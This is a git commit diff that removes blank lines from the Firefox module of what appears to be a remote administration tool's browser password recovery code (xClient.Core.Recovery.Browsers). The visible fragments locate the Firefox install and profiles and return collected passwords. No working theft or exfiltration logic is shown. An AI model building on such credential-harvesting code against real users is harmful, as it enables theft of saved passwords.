format fix

This commit is contained in:
d3agle 2015-08-21 12:59:23 -05:00
parent bed7ed264a
commit 0988187c25
1 changed files with 0 additions and 3 deletions

View File

@ -26,7 +26,6 @@ namespace xClient.Core.Recovery.Browsers
static Firefox()
{
try
{
firefoxPath = GetFirefoxInstallPath();
@ -83,7 +82,6 @@ namespace xClient.Core.Recovery.Browsers
}
catch (Exception)
{
}
return firefoxPasswords;
}
@ -180,7 +178,6 @@ namespace xClient.Core.Recovery.Browsers
// return first profile, fuck it.
return profiles[0];
}
private static FileInfo GetFile(DirectoryInfo profilePath, string searchTerm)
{